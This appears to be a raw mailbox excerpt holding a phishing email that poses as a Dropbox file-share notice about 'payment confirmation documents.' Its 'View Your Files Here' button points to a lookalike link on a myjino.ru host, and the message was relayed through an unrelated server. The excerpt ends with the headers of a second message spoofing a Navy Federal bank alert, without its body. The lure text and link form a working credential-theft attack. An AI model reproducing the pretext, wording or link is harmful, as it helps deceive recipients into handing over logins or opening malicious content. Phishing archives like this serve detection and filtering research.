From: <importantfiles@dropbox.com>
Date: Mon, 30 Jan 2017 13:54:05 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - cloud.fundoosale.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - dropbox.com
X-Get-Message-Sender-Via: cloud.fundoosale.com: authenticated_id: admin@fundoocar.com
X-Authenticated-Sender: cloud.fundoosale.com: admin@fundoocar.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Message-Id: <20170131124746.23C2335FA18@smtpin10.b.hostedemail.com>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 46

You will not see this in a MIME-aware mail reader.
--===============1223584169==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


Dropbox Resent.
 This is at the Request of the Customer , Please find payment confirmation =
documents and process acordingly.

You have 1 Important Documents Uploaded for you using drop box


 View Your Files Here
 =

Dropbox Service!

Regards.

--===============1223584169==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P><SPAN class=3Dm_141258007140594287gmail-m_-=
4362349062263578715gmail-m_7764445534069205239m_6038487968245359897gmail-im=
 style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial; WHITE-SPACE: normal; WORD-SP=
ACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); F=
ONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDE=
NT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit=
-text-stroke-width: 0px"><IMG id=3Dm_141258007140594287gmail-m_-43623490622=
63578715gmail-m_7764445534069205239m_6038487968245359897gmail-yui_3_16_0_ym=
19_1_1478209267160_10094 class=3D"m_141258007140594287gmail-m_-436234906226=
3578715gmail-m_7764445534069205239m_6038487968245359897gmail-yiv1227549859m=
_2253859923673663740gmail-CToWUd m_141258007140594287gmail-m_-4362349062263=
578715gmail-m_7764445534069205239m_6038487968245359897gmail-yiv1227549859CT=
oWUd m_141258007140594287gmail-m_-4362349062263578715gmail-CToWUd m_1412580=
07140594287gmail-CToWUd" alt=3D"The Dropbox logo" src=3D"https://ci3.google=
usercontent.com/proxy/DV-CqODFnKnoG_sdOD2YHfv3RaX32hkk_iyh5tZb6yQ-PJAuNF8do=
oB4Vc7JvVEkpK_Zo9pC5zSLEa_2nEAlkgPspNrI-blD6RAzwPvVI4Az34h7Ez36v2yJYts=3Ds0=
-d-e1-ft#https://cf.dropboxstatic.com/static/images/emails/glyph/glyph%402x=
.png" width=3D40><BR>Dropbox Resent.</SPAN></P>
<P><SPAN class=3Dm_141258007140594287gmail-m_-4362349062263578715gmail-m_77=
64445534069205239m_6038487968245359897gmail-im style=3D"FONT-SIZE: 12px; FO=
NT-FAMILY: arial; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: n=
one; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2=
; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatur=
es: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px">This=
 is at the Request of the Customer , Please find payment confirmation docum=
ents and process acordingly.<BR><BR>You have 1 Important&nbsp;<SPAN class=
=3Dm_141258007140594287gmail-il>Documents</SPAN>&nbsp;Uploaded for you usin=
g drop box</SPAN><BR style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial; WHITE-SP=
ACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; =
COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACIN=
G: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-c=
aps: normal; -webkit-text-stroke-width: 0px"><SPAN class=3Dm_14125800714059=
4287gmail-m_-4362349062263578715gmail-m_7764445534069205239m_60384879682453=
59897gmail-im style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial; WHITE-SPACE: no=
rmal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: =
rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norm=
al; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: no=
rmal; -webkit-text-stroke-width: 0px"><BR></P>
<P><A id=3Dm_141258007140594287gmail-m_-4362349062263578715gmail-m_77644455=
34069205239m_6038487968245359897gmail-yui_3_16_0_ym19_1_1478209267160_10058=
 style=3D"FONT-SIZE: 15px; TEXT-DECORATION: none; MAX-WIDTH: 210px; WIDTH: =
210px; OVERFLOW-X: auto; COLOR: white; PADDING-BOTTOM: 14px; TEXT-ALIGN: ce=
nter; PADDING-TOP: 14px; PADDING-LEFT: 7px; MARGIN: 0px; DISPLAY: block; PA=
DDING-RIGHT: 7px; BACKGROUND-COLOR: rgb(0,126,230); border-radius: 4px" hre=
f=3D"http://campusnews679800.myjino.ru/secure%20drop%20file/dropbox/dropbox=
/dropbox" rel=3Dnofollow target=3D_blank data-saferedirecturl=3D"https://ww=
w.google.com/url?hl=3Den&amp;q=3Dhttp://campusnews679800.myjino.ru/secure%2=
520drop%2520file/dropbox/dropbox/dropbox&amp;source=3Dgmail&amp;ust=3D14858=
88145214000&amp;usg=3DAFQjCNGq1ixCOQVmijYoaxfAFnCAuZ6tWA">View Your Files H=
ere</A></P></SPAN>
<P><BR style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial; WHITE-SPACE: normal; W=
ORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0=
,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEX=
T-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -=
webkit-text-stroke-width: 0px"><SPAN style=3D"FONT-SIZE: 12px; FONT-FAMILY:=
 arial; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-=
WEIGHT: normal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: =
2; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal=
; font-variant-caps: normal; -webkit-text-stroke-width: 0px">Dropbox Servic=
e!</SPAN><BR style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial; WHITE-SPACE: nor=
mal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: r=
gb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norma=
l; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: nor=
mal; -webkit-text-stroke-width: 0px"><BR style=3D"FONT-SIZE: 12px; FONT-FAM=
ILY: arial; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; F=
ONT-WEIGHT: normal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDO=
WS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: no=
rmal; font-variant-caps: normal; -webkit-text-stroke-width: 0px"><SPAN styl=
e=3D"FONT-SIZE: 12px; FONT-FAMILY: arial; WHITE-SPACE: normal; WORD-SPACING=
: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); FONT-S=
TYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0=
px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text=
-stroke-width: 0px">Regards.</SPAN></P></BODY></HTML>
--===============1223584169==--

From jose@monkey.org Wed Feb  1 04:44:42 2017 +0000
Return-Path: nfcuonlinebankalert@nfcu.org
Delivered-To: jose@monkey.org
X-FDA: 72466781604.09.035425D
Received: from filter.hostedemail.com (10.5.16.248.rfc1918.com [10.5.16.248])
	by smtpin09.b.hostedemail.com (Postfix) with ESMTP id 92BF5307813;
	Wed,  1 Feb 2017 04:44:42 +0000 (UTC)
X-Spam-Summary: 75,0,0,cb6b2fda34a2b2ee,d41d8cd98f00b204,nfcuonlinebankalert@nfcu.org,:::nfcuonlinebankalert@nfcu.org,RULES_HIT:41:379:871:962:967:969:979:988:989:1189:1254:1260:1261:1313:1314:1381:1436:1437:1516:1517:1518:1543:1566:1575:1588:1589:1592:1594:1711:1714:1730:1749:1764:1777:1792:2194:2199:2549:2559:2562:2741:2890:2919:3138:3139:3140:3141:3142:3622:3690:3740:3865:3867:3868:3873:4042:4250:4383:5007:6248:6261:6264:6684:6687:6748:7281:7398:7653:8603:8829:10004:10394:10400:10482:11473:11604:11658:11914:12043:12340:12517:12519:12561:12740:12812:12895:12986:13095:13139:13439:14096:14721:14828:19901:19997:21067:21080:21433:21450:21451:21483:30001:30021:30026:30054:30055:30070,0,RBL:198.38.84.154-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:ff,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:69,LUA_SUMMARY:none
X-HE-Tag: shake59_2904ba5766115
X-Filterd-Recvd-Size: 51683
Received: from cloud.fundoosale.com (cloud.fundoosale.com [198.38.84.154])
	by imf01.b.hostedemail.com (Postfix) with ESMTP;
	Wed,  1 Feb 2017 04:44:41 +0000 (UTC)
Received: from 50-255-211-209-static.hfc.comcastbusiness.net ([50.255.211.209]:63905 helo=[192.168.2.226])
	by cloud.fundoosale.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.87)
	(envelope-from <nfcuonlinebankalert@nfcu.org>)
	id 1cYHEN-0001Kn-8p; Mon, 30 Jan 2017 14:03:11 -0500
Content-Type: multipart/mixed; boundary="===============0005211849=="
MIME-Version: 1.0
Subject: Important Update
To: Recipients <nfcuonlinebankalert@nfcu.org>
